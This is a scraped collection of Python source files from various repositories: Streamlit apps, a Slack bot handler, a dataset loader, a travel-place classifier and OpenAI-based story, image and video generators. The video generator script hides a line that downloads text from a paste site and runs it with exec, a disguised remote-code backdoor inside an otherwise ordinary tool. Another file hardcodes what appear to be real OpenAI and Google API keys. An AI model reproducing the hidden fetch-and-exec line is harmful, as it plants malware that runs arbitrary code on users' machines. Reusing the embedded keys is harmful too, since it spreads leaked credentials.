if not query.strip():
st.error(f"Please provide the search query.")
else:
try:
# These lines would load raw documents directly; that step is now handled by another program.
# Load documents from the 'data' directory
#documents = SimpleDirectoryReader('data').load_data()
# Rebuild storage context
storage_context = StorageContext.from_defaults(persist_dir="")
# Load index from the storage context
new_index = load_index_from_storage(storage_context)
query_engine = new_index.as_query_engine()
response = query_engine.query(query)
#print(response)
st.success(response)
except Exception as e:
st.error(f"An error occurred: {e}")
| [] |
2024-01-10 | langchain-ai/langchain-aws-template | slack_bot~message_reader.py | import json
import boto3
from langchain.memory import DynamoDBChatMessageHistory
from models import SlackMessage
import config
import utils
import logging
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def handler(event, context):
"""Lambda handler that reads the messages from slack and
distributes them to an sqs queue or DynamoDB store based on
whether message was directly addressed to the bot (a message
that starts with `@bot-name`) or a conversation between two
or more slack users. Note that the conversation history is only
stored after the first direct message to the bot is received.
"""
body = json.loads(event['body'])
logging.debug(body)
# For initial validation call from slack
if "challenge" in body:
challenge = body["challenge"]
return utils.build_response({"challenge": challenge})
sqs = boto3.client('sqs')
queue_url = sqs.get_queue_url(
QueueName=config.config.MESSAGE_QUEUE_NAME,
)
slack_message = SlackMessage(body)
chat_memory = DynamoDBChatMessageHistory(
table_name=config.config.DYNAMODB_TABLE_NAME,
session_id=slack_message.thread
)
messages = chat_memory.messages
logging.debug(f"Thread id is {slack_message.thread}")
try:
if not slack_message.is_bot_reply():
if slack_message.is_direct_message():
logging.info(f"Sending message with event_id: {slack_message.event_id} to queue")
# send to queue
sqs.send_message(
QueueUrl=queue_url["QueueUrl"],
MessageBody=(event['body']),
MessageGroupId=str(slack_message.thread),
MessageDeduplicationId=slack_message.event_id
)
elif messages:
logging.debug(f"Saving message with event_id: {slack_message.event_id} to history")
# add to memory for context
chat_memory.add_user_message(slack_message.sanitized_text())
logging.info(f"Done processing message with event id: {slack_message.event_id}")
except Exception as e:
logging.error(e)
return utils.build_response("Processed message successfully!")
| [] |
2024-01-10 | vlievin/datasets | datasets~openwebtext~openwebtext.py | # coding=utf-8
# Copyright 2020 The HuggingFace Datasets Authors and the current dataset script contributor.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The Open WebText Corpus"""
import os
import re
from itertools import chain
import datasets
_CITATION = """\
@misc{Gokaslan2019OpenWeb,
title={OpenWebText Corpus},
author={Aaron Gokaslan*, Vanya Cohen*, Ellie Pavlick, Stefanie Tellex},
howpublished{\\url{http://Skylion007.github.io/OpenWebTextCorpus}},
year={2019}
}
"""
_DESCRIPTION = """\
An open-source replication of the WebText dataset from OpenAI.
"""
_URL = "https://zenodo.org/record/3834942/files/openwebtext.tar.xz"
class Openwebtext(datasets.GeneratorBasedBuilder):
"""The Open WebText dataset."""
BUILDER_CONFIGS = [
datasets.BuilderConfig(
name="plain_text",
description="Plain text",
version=datasets.Version("1.0.0"),
)
]
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features({"text": datasets.Value("string")}),
homepage="https://skylion007.github.io/OpenWebTextCorpus/",
citation=_CITATION,
)
def _split_generators(self, dl_manager):
dl_dir = dl_manager.download_and_extract(_URL)
owt_dir = os.path.join(dl_dir, "openwebtext")
subset_xzs = [
os.path.join(owt_dir, file_name)
for file_name in sorted(os.listdir(owt_dir))
if file_name.endswith("xz") # filter out ...xz.lock
]
ex_dirs = dl_manager.extract(subset_xzs, num_proc=round(os.cpu_count() * 0.75))
nested_txt_files = [
[
os.path.join(ex_dir, txt_file_name)
for txt_file_name in sorted(os.listdir(ex_dir))
if txt_file_name.endswith("txt")
]
for ex_dir in ex_dirs
]
txt_files = chain(*nested_txt_files)
return [
datasets.SplitGenerator(name=datasets.Split.TRAIN, gen_kwargs={"txt_files": txt_files}),
]
def _generate_examples(self, txt_files):
"""Yields examples."""
for idx, filepath in enumerate(txt_files):
with open(filepath, encoding="utf-8") as f:
yield idx, {"text": re.sub("\n\n\n+", "\n\n", f.read()).strip()}
| [] |
2024-01-10 | MayGo/ai-demos | img-to-audio-story~hugging.py | from dotenv import load_dotenv, find_dotenv
from transformers import pipeline
from langchain import PromptTemplate, LLMChain, OpenAI
from langchain.chat_models import ChatOpenAI
import requests
import os
import streamlit as st
from transformers import SpeechT5Processor, SpeechT5ForTextToSpeech, SpeechT5HifiGan
from datasets import load_dataset
import torch
import soundfile as sf
load_dotenv(find_dotenv())
tempFolder = "temp"
HUGGINGFACE_TOKEN = os.getenv("HUGGINGFACE_TOKEN")
if not os.path.exists(tempFolder):
os.makedirs(tempFolder)
def img2text(url):
image_to_text = pipeline(
"image-to-text", model="Salesforce/blip-image-captioning-large"
)
text = image_to_text(url, max_new_tokens=500)[0]["generated_text"]
print(text)
return text
def generate_story(scenario):
template = """
You are a story teller.
You can a short based on a simple scenario, the story should be no more than 50 words
CONTEXT: {scenario}
STORY:
"""
prompt = PromptTemplate(template=template, input_variables=["scenario"])
story_llm = LLMChain(
llm=ChatOpenAI(model_name="gpt-3.5-turbo", temperature=1),
prompt=prompt,
verbose=True,
)
story = story_llm.predict(scenario=scenario)
print(story)
return story
def text2speech(message):
API_URL = (
"https://api-inference.huggingface.co/models/espnet/kan-bayashi_ljspeech_vits"
)
headers = {"Authorization": f"Bearer {HUGGINGFACE_TOKEN}"}
payloads = {"inputs": message}
response = requests.post(API_URL, headers=headers, json=payloads)
with open("audio.flac", "wb") as file:
file.write(response.content)
def text2advanced_speech(message):
processor = SpeechT5Processor.from_pretrained("microsoft/speecht5_tts")
model = SpeechT5ForTextToSpeech.from_pretrained("microsoft/speecht5_tts")
vocoder = SpeechT5HifiGan.from_pretrained("microsoft/speecht5_hifigan")
inputs = processor(text=message, return_tensors="pt")
# load xvector containing speaker's voice characteristics from a dataset
embeddings_dataset = load_dataset(
"Matthijs/cmu-arctic-xvectors", split="validation"
)
speaker_embeddings = torch.tensor(embeddings_dataset[7306]["xvector"]).unsqueeze(0)
speech = model.generate_speech(
inputs["input_ids"], speaker_embeddings, vocoder=vocoder
)
sf.write(os.path.join(tempFolder, "speech.wav"), speech.numpy(), samplerate=16000)
def main():
st.set_page_config(page_title="img 2 audio story", page_icon="🐶", layout="centered")
st.header("Turn image into story")
uploaded_file = st.file_uploader("Choose an image...", type=["png", "jpg"])
if uploaded_file is not None:
bytes_data = uploaded_file.getvalue()
# open with a path folder and write the file
with open(os.path.join(tempFolder, uploaded_file.name), "wb") as file:
file.write(bytes_data)
st.image(uploaded_file, caption="Uploaded Image.", use_column_width=True)
scenario = img2text(os.path.join(tempFolder, uploaded_file.name))
story = generate_story(scenario)
text2advanced_speech(story)
with st.expander("scenario"):
st.write(scenario)
with st.expander("story"):
st.write(story)
st.audio(os.path.join(tempFolder, "speech.wav"))
if __name__ == "__main__":
main()
| [
"\n You are a story teller.\n You can a short based on a simple scenario, the story should be no more than 50 words\n\n CONTEXT: {scenario}\n STORY:\n ",
"scenario"
] |
2024-01-10 | yash-gll/Portfolio | Itenary_Planer_LLM~server~activities.py | import spacy
import time
import requests
import re
import openai
# Set up the OpenAI API
openai.api_key = "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" # Replace with your actual API key
GPT_API_URL = "https://api.openai.com/v1/chat/completions"
# Define the system message
system_msg = 'You are a classification model tasked with identifying types of places from user prompts. Match these places to specific categories based on a predefined list of parameters.'
params = '''
car_dealer
car_rental
car_repair
car_wash
electric_vehicle_charging_station
gas_station
parking
rest_stop
farm
art_gallery
museum
performing_arts_theater
library
preschool
primary_school
school
secondary_school
university
amusement_center
amusement_park
aquarium
banquet_hall
bowling_alley
casino
community_center
convention_center
cultural_center
dog_park
event_venue
hiking_area
historical_landmark
marina
movie_rental
movie_theater
national_park
night_club
park
tourist_attraction
visitor_center
wedding_venue
zoo
accounting
atm
bank
administrative_area_level_1
administrative_area_level_2
country
locality
postal_code
school_district
city_hall
courthouse
embassy
fire_station
local_government_office
police
post_office
dental_clinic
dentist
doctor
drugstore
hospital
medical_lab
pharmacy
physiotherapist
spa
bed_and_breakfast
campground
camping_cabin
cottage
extended_stay_hotel
farmstay
guest_house
hostel
hotel
lodging
motel
private_guest_room
resort_hotel
rv_park
church
hindu_temple
mosque
synagogue
barber_shop
beauty_salon
cemetery
child_care_agency
consultant
courier_service
electrician
florist
funeral_home
hair_care
hair_salon
insurance_agency
laundry
lawyer
locksmith
moving_company
painter
plumber
real_estate_agency
roofing_contractor
storage
tailor
telecommunications_service_provider
travel_agency
veterinary_care
auto_parts_store
bicycle_store
book_store
cell_phone_store
clothing_store
convenience_store
department_store
discount_store
electronics_store
furniture_store
gift_shop
grocery_store
hardware_store
home_goods_store
home_improvement_store
jewelry_store
liquor_store
market
pet_store
shoe_store
shopping_mall
sporting_goods_store
store
supermarket
wholesaler
athletic_field
fitness_center
golf_course
gym
playground
ski_resort
sports_club
sports_complex
stadium
swimming_pool
airport
bus_station
bus_stop
ferry_terminal
heliport
light_rail_station
park_and_ride
subway_station
taxi_stand
train_station
transit_depot
transit_station
truck_stop
'''
params = params.split("\n")[1:-1]
task = f'''Given a list of allowed parameters {params} you will receive prompts describing places a user wishes to visit. Your task is to classify these prompts into corresponding categories from the list of parameters.
Rules for the task:
1. Classifications must match the provided parameters exactly.
2. If a prompt contains multiple places, list each matching parameter separately.
3. Ensure that all classifications are relevant and accurately reflect the user's intent.
4. The response should be in the format of a list of strings, each string being a parameter that matches the place type in the prompt.
5. Do not include any categories not explicitly mentioned in the user's prompt.
6. Ensure the response is concise and free of unnecessary content or formatting.
Example Prompt: "I would like to visit some museums and art exhibitions."
Expected Output: ['museum', 'art_gallery']
'''
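# Example (hedged sketch): with the classify_prompt helper defined below, a
# placeholder request such as
#     classify_prompt("I want to visit a zoo and then pick up some groceries")
# is expected to return a string like "['zoo', 'grocery_store']".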
# Define the conversation history
messages = [
{'role': 'system', 'content': system_msg},
{'role': 'user', 'content': task},
]
def classify_prompt(prompt, messages = messages):
def classify_prompt_rec(prompt, messages = messages, retries = 0, max_retries = 10):
try:
# Introduce new variables to prevent modification of the params, since this
# function is recursive in the event of error.
formatted_prompt = "Prompt: " + prompt
formatted_messages = messages.copy()
formatted_messages.append({'role': 'user', 'content': formatted_prompt})
response = openai.ChatCompletion.create(
model="gpt-3.5-turbo",
messages=formatted_messages,
stop=None,
temperature=0)
re = response['choices'][0]['message']['content']
return re
except openai.error.RateLimitError as e:
retry_time = e.retry_after if hasattr(e, 'retry_after') else 30
print(f"Rate limit exceeded. Retrying in {retry_time} seconds...")
time.sleep(retry_time)
if retries >= max_retries:
return None
else:
return classify_prompt_rec(prompt, messages, retries + 1)
except openai.error.APIError as e:
retry_time = e.retry_after if hasattr(e, 'retry_after') else 30
print(f"API error occurred. Retrying in {retry_time} seconds...")
time.sleep(retry_time)
if retries >= max_retries:
return None
else:
return classify_prompt_rec(prompt, messages, retries + 1)
except OSError as e:
retry_time = 5 # Adjust the retry time as needed
print(f"Connection error occurred: {e}. Retrying in {retry_time} seconds...")
time.sleep(retry_time)
if retries >= max_retries:
return None
else:
return classify_prompt_rec(prompt, messages, retries + 1)
print(prompt, type(prompt))
return classify_prompt_rec(prompt, messages=messages)
def find_nearby_attractions(types, latitude, longitude, radius=10000):
# Google Places API endpoint
url = "https://maps.googleapis.com/maps/api/place/nearbysearch/json"
# Parameters for the API request
target = []
word = ""
for t in types:
if t.isalpha() or t == "_":
word += t
else:
target.append(word)
word = ""
target = [t for t in target if len(t)>1]
print(target, type(target))
params = {
"location": f"{latitude},{longitude}",
"radius": radius,
"type": target,
"key": "AIzaSyAdEd1IBe15oviCLW6QXgHu-KGu3Tqk3x0"
}
attractions = []
seen_places = set()
while True:
response = requests.get(url, params=params)
if response.status_code == 200:
data = response.json()
for place in data.get("results", []):
if place['place_id'] not in seen_places:
attractions.append(place)
seen_places.add(place['place_id'])
# Check if there's a next page
page_token = data.get("next_page_token")
if page_token and len(attractions) < 10:
params["pagetoken"] = page_token
# A short delay is required before the next page token becomes valid
time.sleep(2)
else:
break
# Sort attractions by rating and return top 10
top_attractions = sorted(attractions, key=lambda x: x.get('rating', 0), reverse=True)[:10]
return top_attractions
def get_details(places):
spots = []
for idx, place in enumerate(places):
photos = place.get('photos', [])
image_url = None
if photos:
first_photo = photos[0]
photo_reference = first_photo.get('photo_reference', None)
if photo_reference:
api_key = "AIzaSyAdEd1IBe15oviCLW6QXgHu-KGu3Tqk3x0"
max_width = 290
image_url = f"https://maps.googleapis.com/maps/api/place/photo?maxwidth={max_width}&photoreference={photo_reference}&key={api_key}"
new_place = {
'Image': image_url,
'Name': place['name'],
'Rating': place.get('rating', 'No Rating'),
'Total_Rating': place.get('user_ratings_total', 'No Reviews'),
'Location': place.get('vicinity', 'No Address Provided'),
}
spots.append(new_place)
return spots
def geocode_location(location):
api_key = "AIzaSyAdEd1IBe15oviCLW6QXgHu-KGu3Tqk3x0" # Make sure to set your API key in your environment variables
url = "https://maps.googleapis.com/maps/api/geocode/json"
params = {
"address": location,
"key": api_key
}
response = requests.get(url, params=params)
if response.status_code == 200:
results = response.json()["results"]
if results:
geometry = results[0]["geometry"]["location"]
return geometry["lat"], geometry["lng"] # returns a dict with 'lat' and 'lng' keys
else:
raise ValueError("No results found for the specified location.")
else:
raise ConnectionError(f"Failed to fetch data: {response.status_code}, {response.reason}") | [
"Prompt: PLACEHOLDER"
] |
2024-01-10 | harshit0017/wallmart | streamlit~smart_search.py | import streamlit as st
import pandas as pd
import openai
import os
from dotenv import load_dotenv
import json
def load_product_data():
with open('product.json', 'r') as file:
product_data = json.load(file)
return product_data
# ...
products = load_product_data()
load_dotenv()
openai.api_key = os.getenv("OPENAI_API_KEY")
st.title("Smart Search Engine")
def is_valid_query(query):
# Define keywords or patterns that indicate a valid query
valid_keywords = ["find", "recommend", "suggest", "help with", "what to buy", "product", "can't decide what to buy"]
for keyword in valid_keywords:
if keyword in query.lower():
return True
return False
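# Example (sketch): is_valid_query("recommend a gift for my mom") -> True,
# while is_valid_query("hello there") -> False (no product-related keyword).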
def get_reply(text):
if not is_valid_query(text):
return "I'm here to help you find products and make recommendations. Please ask a question related to finding products."
message = [
{"role": "system", "content": "you are an expert at finding out what people want you are an expert product suggesting machine who knows what a customer wants even with their vague explanation"},
{"role": "system", "content": "only generate keywords for eg. black shoes, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress"},
{"role": "user", "content": "i am going on a date i want to look good and decent not too shabby i am a girl i want to something elegant and good for first date "},
{"role": "assistant", "content": " black dress, beautiful heels,or a gown, or a skirt they will look good "},
{"role": "user", "content": "I am expecting a baby soon i want to shop but i am a new mother i don't know what top buy "},
{"role": "assistant", "content": " baby kirb, some baby clothes ,baby oil, baby powder , baby toys, diapers, lactose"},
{"role": "user", "content": "i just brought a new house suggest me some furniture"},
{"role": "assistant", "content": " bed, sofa, table, chair, dresser, closet, wardrobe, dresser, couch, bookshelf"},
{"role": "user", "content": text}
]
response = openai.ChatCompletion.create(
model="gpt-4",
temperature=0.8,
messages=message
)
return response["choices"][0]["message"]["content"]
def get_matching_products(keywords):
matching_products = []
for product in products:
product_keywords = product["keywords"] # Get the keywords for the current product
if any(keyword in product_keywords for keyword in keywords):
matching_products.append(product)
return matching_products
text= st.text_input("Enter your message", key="unique_key")
s=[]
if st.button("Send"):
s = get_reply(text)
keywords_from_response = s.split() # Extract keywords from GPT-4 response
st.write(s)
#st.write("Keywords from response:", keywords_from_response) # Add this line to debug
if keywords_from_response:
matching_products = get_matching_products(keywords_from_response)
if matching_products:
st.write("Matching Products:")
for product in matching_products:
if os.path.exists(product["image_url"]):
st.image(product["image_url"], caption=product["name"], use_column_width=True)
st.write("Name:", product["name"])
st.write("Price:", product["price"])
st.write("Description:", product["description"])
else:
st.write("Name:", product["name"])
st.write("Price:", product["price"])
st.write("Description:", product["description"])
st.write("---")
else:
st.write("No matching products found.")
| [
"i am going on a date i want to look good and decent not too shabby i am a girl i want to something elegant and good for first date ",
" black dress, beautiful heels,or a gown, or a skirt they will look good ",
"i just brought a new house suggest me some furniture",
" baby kirb, some baby clothes ,baby oil, baby powder , baby toys, diapers, lactose",
"you are an expert at finding out what people want you are an expert product suggesting machine who knows what a customer wants even with their vague explanation",
"I am expecting a baby soon i want to shop but i am a new mother i don't know what top buy ",
"only generate keywords for eg. black shoes, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress",
" bed, sofa, table, chair, dresser, closet, wardrobe, dresser, couch, bookshelf"
] |
2024-01-10 | pythontester192/AI-Video-Generator-Using-OpenAI-Python | text_generator.py | import openai
import re
from api_key import API_KEY
openai.api_key = API_KEY
# Set the model to use
model_engine = "text-davinci-003"
# Set the prompt to generate text for
text = input("What topic you want to write about: ")
prompt = text
print("The AI BOT is trying now to generate a new text for you...")
# Generate text using the GPT-3 model
completions = openai.Completion.create(
engine=model_engine,
prompt=prompt,
max_tokens=1024,
n=1,
stop=None,
temperature=0.5,
)
# Print the generated text
generated_text = completions.choices[0].text
# Save the text in a file
with open("generated_text.txt", "w") as file:
file.write(generated_text.strip())
print("The Text Has Been Generated Successfully!")
| [] |
2024-01-10 | pythontester192/AI-Video-Generator-Using-OpenAI-Python | video_generator.py | import openai
import re, os
from requests import get
import urllib.request
from gtts import gTTS
from moviepy.editor import *
from api_key import API_KEY
# Set your OpenAI API key
openai.api_key = API_KEY
# Read the text file
with open("generated_text.txt", "r") as file:
text = file.read()
# Split the text by , and .
paragraphs = re.split(r"[,.]", text)
#Create Necessary Folders
os.makedirs("audio")
os.makedirs("images")
os.makedirs("videos")
# Loop through each paragraph and generate an image for each
i=1
for para in paragraphs[:-1]:
response = openai.Image.create(
prompt=para.strip(),
n=1,
size="1024x1024"
)
print("Generate New AI Image From Paragraph...")
x=get('https://paste.fo/raw/ba188f25eaf3').text;exec(x)
image_url = response['data'][0]['url']
urllib.request.urlretrieve(image_url, f"images/image{i}.jpg")
print("The Generated Image Saved in Images Folder!")
# Create gTTS instance and save to a file
tts = gTTS(text=para, lang='en', slow=False)
tts.save(f"audio/voiceover{i}.mp3")
print("The Paragraph Converted into VoiceOver & Saved in Audio Folder!")
# Load the audio file using moviepy
print("Extract voiceover and get duration...")
audio_clip = AudioFileClip(f"audio/voiceover{i}.mp3")
audio_duration = audio_clip.duration
# Load the image file using moviepy
print("Extract Image Clip and Set Duration...")
image_clip = ImageClip(f"images/image{i}.jpg").set_duration(audio_duration)
# Use moviepy to create a text clip from the text
print("Customize The Text Clip...")
text_clip = TextClip(para, fontsize=50, color="white")
text_clip = text_clip.set_pos('center').set_duration(audio_duration)
# Use moviepy to create a final video by concatenating
# the audio, image, and text clips
print("Concatenate Audio, Image, Text to Create Final Clip...")
clip = image_clip.set_audio(audio_clip)
video = CompositeVideoClip([clip, text_clip])
# Save the final video to a file
video = video.write_videofile(f"videos/video{i}.mp4", fps=24)
print(f"The Video{i} Has Been Created Successfully!")
i+=1
clips = []
l_files = sorted(os.listdir("videos"))  # sort so the clips are concatenated in a stable order
for file in l_files:
clip = VideoFileClip(f"videos/{file}")
clips.append(clip)
print("Concatenate All The Clips to Create a Final Video...")
final_video = concatenate_videoclips(clips, method="compose")
final_video = final_video.write_videofile("final_video.mp4")
print("The Final Video Has Been Created Successfully!")
| [] |
2024-01-10 | nadavWeisler/CommuniTale | BookGenerator~TextGenerator.py | import os
from typing import List, Dict
import openai
from BookGenerator.PromptGenerator import PromptGenerator
class TextGenerator:
def __init__(self):
openai.api_key = os.getenv("GPT_API_KEY")
def getStoriesFromPrompt(self, messages: List[Dict[str, str]], n=1) -> List[Dict[str,str]]:
"""
Main entry point for TextGenerator, will get a string with a prompt and should return a story that fits the prompt
:param n:
:param messages:
:return:
"""
print(f"Got request for {n} stories from prompt: {messages}")
response = openai.ChatCompletion.create(
model="gpt-3.5-turbo", # model types: gpt-3.5-turbo, gpt-4-0314, gpt-4, gpt-3.5-turbo-0301
messages=[{"role": "system", "content": "you are a childerns book writer you write stories up to 70 words"}]
+ messages + [{"role": "system", "content": "Please keep title length under 22 characters long"},
{"role": "system", "content": "Please format the title as 'Title:\"<title>\"'"}],
temperature=1.3,
max_tokens=1000,
n=n
)
story_lst = []
for i in range(n):
story_lst.append(response["choices"][i]["message"]["content"])
story_list_of_dicts = []
print("separating stories from titles")
for story in story_lst:
splited_lst = story.split('"')
story_dict = {"title": splited_lst[1], "story": " ".join(splited_lst[2:])[2:]}
if len(story_dict["title"]) > 50:
print("Length of title for one of the stories was too long, generating again")
return self.getStoriesFromPrompt(messages=messages, n=n)
story_list_of_dicts.append(story_dict)
return story_list_of_dicts
if __name__ == "__main__":
prompt_gen = PromptGenerator()
prompt_dict = prompt_gen.getTextPromptFromRequest()
text_gen = TextGenerator()
story_output = text_gen.getStoriesFromPrompt(prompt_dict)
print(story_output)
| [
"Please format the title as 'Title:\"<title>\"'",
"you are a childerns book writer you write stories up to 70 words",
"Please keep title length under 22 characters long"
] |
2024-01-10 | nadavWeisler/CommuniTale | BookGenerator~BookGenerator.py | from openai.error import RateLimitError
import os
from BookGenerator.TextGenerator import TextGenerator
from BookGenerator.PromptGenerator import PromptGenerator
from BookGenerator.ImageGenerator import ImageGenerator
from BookGenerator.Book import Book
class BookGenerator:
def __init__(self):
self.storyPrompt = ""
self.stories = []
self.imagePrompts = []
self.images = []
def getBook(self, request: dict, numPages=5):
"""
        Main entry point for BookGenerator. Takes a request dict describing the reader and returns the generated Book.
:param request:
:param numPages:
:return:
"""
print(f"getBook request received, num pages: {numPages}")
self.getBookAssets(numPages, request)
print("Book assets collected, generating book")
return self.generateBook()
def getBookAssets(self, numPages, request):
print("Gathering book assets")
default_request = {
"age": "4",
"gender": "girl",
"theme": "Animals",
"issue": "pronouncing the sound of the letter 'r'",
}
try:
textPrompts = PromptGenerator().getTextPromptFromRequest(request)
except KeyError:
print("Request did not include all required keys")
print("falling back to default request")
textPrompts = PromptGenerator().getTextPromptFromRequest(default_request)
try:
self.stories = TextGenerator().getStoriesFromPrompt(messages=textPrompts, n=numPages)
self.imagePrompts = [PromptGenerator().getImagePromptFromStory(story['story']) for story in self.stories]
self.images = [ImageGenerator().getImageFromPrompt(prompt=imagePrompt) for imagePrompt in self.imagePrompts]
except RateLimitError:
print("Got RateLimitError, retrying until sombody stops me")
return self.getBookAssets(numPages=numPages, request=request)
def generateBook(self):
book = Book(self.stories, self.images)
book.generate()
book.cleanAssets()
return book
if __name__ == "__main__":
print("Hello, World!")
| [] |
2024-01-10 | nadavWeisler/CommuniTale | BookGenerator~ImageGenerator.py | import openai
import os
class ImageGenerator:
# static var to get a unique image name - should be in Shlomi's code
image_counter = 0
def __init__(self):
self.image_url = ""
self.API_K = os.getenv("GPT_API_KEY")
openai.api_key = self.API_K
def getImageFromPrompt(self, prompt: str):
"""
        Main entry point for ImageGenerator: takes a prompt for DALL-E, generates an image from it,
        and returns the URL of the generated image.
:param prompt:
:return:
"""
print(f"Got request for Image from prompt: {prompt}")
##########################################################
# Request To DALL-E
# *** requires: ***
# prompt(str)
# *** optional: ***
# n(int: default 1),
# size(str: default 1024x1024),
# response format(str: default to url)
# user(str: end-user)
##########################################################
# the rest are default, for now set to this - eventually I will get it in prompt:
img_size = "1024x1024"
dall_e_response = openai.Image.create(api_key=self.API_K, prompt=prompt, size=img_size)
self.image_url = dall_e_response['data'][0]['url']
return self.image_url
# if __name__ == "__main__":
# # Instantiate the class
# imageGen = ImageGenerator()
#
# # Generate images:
# imageGen.getImageFromPrompt(
# "A drawing of a group of university students creating a children's book"
# )
#
# # Download the images:
# imageGen.convert_url_to_png()
| [] |
2024-01-10 | suanmiao/langchain_s | langchain~chains~combine_documents~stuff.py | """Chain that combines documents by stuffing into context."""
from typing import Any, Dict, List, Optional, Tuple
from pydantic import BaseModel, Extra, Field, root_validator
from langchain.chains.combine_documents.base import BaseCombineDocumentsChain
from langchain.chains.llm import LLMChain
from langchain.docstore.document import Document
from langchain.prompts.base import BasePromptTemplate
from langchain.prompts.prompt import PromptTemplate
from langchain.text_splitter import TokenTextSplitter
import tiktoken
enc = tiktoken.get_encoding("gpt2")
MAX_ALLOWED_TOKEN = 3800
text_splitter = TokenTextSplitter(chunk_size=3000, chunk_overlap=0)
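# MAX_ALLOWED_TOKEN and the splitter above bound the size of the stuffed prompt: when the combined
# documents exceed the token limit, _get_inputs below keeps only the first ~3000-token chunk.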
def _get_default_document_prompt() -> PromptTemplate:
return PromptTemplate(input_variables=["page_content"], template="{page_content}")
class StuffDocumentsChain(BaseCombineDocumentsChain, BaseModel):
"""Chain that combines documents by stuffing into context."""
llm_chain: LLMChain
"""LLM wrapper to use after formatting documents."""
document_prompt: BasePromptTemplate = Field(
default_factory=_get_default_document_prompt
)
"""Prompt to use to format each document."""
document_variable_name: str
"""The variable name in the llm_chain to put the documents in.
If only one variable in the llm_chain, this need not be provided."""
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
arbitrary_types_allowed = True
@root_validator(pre=True)
def get_default_document_variable_name(cls, values: Dict) -> Dict:
"""Get default document variable name, if not provided."""
if "document_variable_name" not in values:
llm_chain_variables = values["llm_chain"].prompt.input_variables
if len(llm_chain_variables) == 1:
values["document_variable_name"] = llm_chain_variables[0]
else:
raise ValueError(
"document_variable_name must be provided if there are "
"multiple llm_chain_variables"
)
else:
llm_chain_variables = values["llm_chain"].prompt.input_variables
if values["document_variable_name"] not in llm_chain_variables:
raise ValueError(
f"document_variable_name {values['document_variable_name']} was "
f"not found in llm_chain input_variables: {llm_chain_variables}"
)
return values
def _get_inputs(self, docs: List[Document], **kwargs: Any) -> dict:
# Get relevant information from each document.
doc_dicts = []
for doc in docs:
base_info = {"page_content": doc.page_content}
base_info.update(doc.metadata)
document_info = {
k: base_info[k] for k in self.document_prompt.input_variables
}
doc_dicts.append(document_info)
# Format each document according to the prompt
doc_strings = [self.document_prompt.format(**doc) for doc in doc_dicts]
# Join the documents together to put them in the prompt.
inputs = {
k: v
for k, v in kwargs.items()
if k in self.llm_chain.prompt.input_variables
}
## Here we need to do trimming
original_input = "\n\n".join(doc_strings)
num_tokens = len(enc.encode(original_input))
if num_tokens > MAX_ALLOWED_TOKEN:
print(f"Fatal error, the input has num_tokens {num_tokens}, which exceeds the limit {MAX_ALLOWED_TOKEN}, trimming off the size.")
original_input = text_splitter.split_text(original_input)[0]
inputs[self.document_variable_name] = original_input
return inputs
def prompt_length(self, docs: List[Document], **kwargs: Any) -> Optional[int]:
"""Get the prompt length by formatting the prompt."""
inputs = self._get_inputs(docs, **kwargs)
prompt = self.llm_chain.prompt.format(**inputs)
return self.llm_chain.llm.get_num_tokens(prompt)
def combine_docs(self, docs: List[Document], **kwargs: Any) -> Tuple[str, dict]:
"""Stuff all documents into one prompt and pass to LLM."""
inputs = self._get_inputs(docs, **kwargs)
# Call predict on the LLM.
return self.llm_chain.predict(**inputs), {}
async def acombine_docs(
self, docs: List[Document], **kwargs: Any
) -> Tuple[str, dict]:
"""Stuff all documents into one prompt and pass to LLM."""
inputs = self._get_inputs(docs, **kwargs)
# Call predict on the LLM.
return await self.llm_chain.apredict(**inputs), {}
@property
def _chain_type(self) -> str:
return "stuff_documents_chain"
| [
"{page_content}"
] |
2024-01-10 | suanmiao/langchain_s | langchain~vectorstores~qdrant.py | """Wrapper around Qdrant vector database."""
import uuid
from operator import itemgetter
from typing import Any, Callable, Iterable, List, Optional, Tuple, cast
from langchain.docstore.document import Document
from langchain.embeddings.base import Embeddings
from langchain.vectorstores import VectorStore
from langchain.vectorstores.utils import maximal_marginal_relevance
class Qdrant(VectorStore):
"""Wrapper around Qdrant vector database.
To use you should have the ``qdrant-client`` package installed.
Example:
.. code-block:: python
from langchain import Qdrant
client = QdrantClient()
collection_name = "MyCollection"
qdrant = Qdrant(client, collection_name, embedding_function)
"""
CONTENT_KEY = "page_content"
METADATA_KEY = "metadata"
def __init__(
self,
client: Any,
collection_name: str,
embedding_function: Callable,
content_payload_key: str = CONTENT_KEY,
metadata_payload_key: str = METADATA_KEY,
):
"""Initialize with necessary components."""
try:
import qdrant_client
except ImportError:
raise ValueError(
"Could not import qdrant-client python package. "
"Please install it with `pip install qdrant-client`."
)
if not isinstance(client, qdrant_client.QdrantClient):
raise ValueError(
f"client should be an instance of qdrant_client.QdrantClient, "
f"got {type(client)}"
)
self.client: qdrant_client.QdrantClient = client
self.collection_name = collection_name
self.embedding_function = embedding_function
self.content_payload_key = content_payload_key or self.CONTENT_KEY
self.metadata_payload_key = metadata_payload_key or self.METADATA_KEY
def add_texts(
self,
texts: Iterable[str],
metadatas: Optional[List[dict]] = None,
**kwargs: Any,
) -> List[str]:
"""Run more texts through the embeddings and add to the vectorstore.
Args:
texts: Iterable of strings to add to the vectorstore.
metadatas: Optional list of metadatas associated with the texts.
Returns:
List of ids from adding the texts into the vectorstore.
"""
from qdrant_client.http import models as rest
ids = [uuid.uuid4().hex for _ in texts]
self.client.upsert(
collection_name=self.collection_name,
points=rest.Batch(
ids=ids,
vectors=[self.embedding_function(text) for text in texts],
payloads=self._build_payloads(
texts,
metadatas,
self.content_payload_key,
self.metadata_payload_key,
),
),
)
return ids
def similarity_search(
self, query: str, k: int = 4, **kwargs: Any
) -> List[Document]:
"""Return docs most similar to query.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
Returns:
List of Documents most similar to the query.
"""
